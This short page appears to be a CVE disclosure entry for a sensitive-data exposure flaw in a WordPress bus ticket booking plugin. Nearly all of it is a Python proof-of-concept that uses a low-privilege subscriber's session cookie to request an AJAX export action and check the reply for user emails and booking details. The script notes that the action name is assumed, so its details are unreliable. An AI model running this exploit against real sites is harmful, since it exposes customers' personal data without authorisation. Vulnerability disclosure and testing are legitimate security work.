CVE-2026-39572: Bus Ticket Booking插件敏感信息泄露

import requests # PoC for CVE-2026-39572: Sensitive Data Exposure # Attacker needs a low-privilege account (Subscriber level) target_url = "http://example.com/wp-admin/admin-ajax.php" # Cookies for a low-privileged user (e.g., subscriber) cookies = { "wordpress_logged_in_xxx": "session_id_here" } # Example payload to trigger data retrieval # Note: The specific 'action' parameter depends on the plugin's internal implementation data = { "action": "btb_export_data", "type": "sensitive_info" } try: response = requests.post(target_url, data=data, cookies=cookies, timeout=10) if response.status_code == 200: # Check if sensitive data is present in the response if "user_email" in response.text or "booking_details" in response.text: print("[+] Vulnerability confirmed! Sensitive data exposed.") print("[+] Response snippet:", response.text[:200]) else: print("[-] Request sent, but no obvious sensitive data found in response.") else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] An error occurred:", str(e))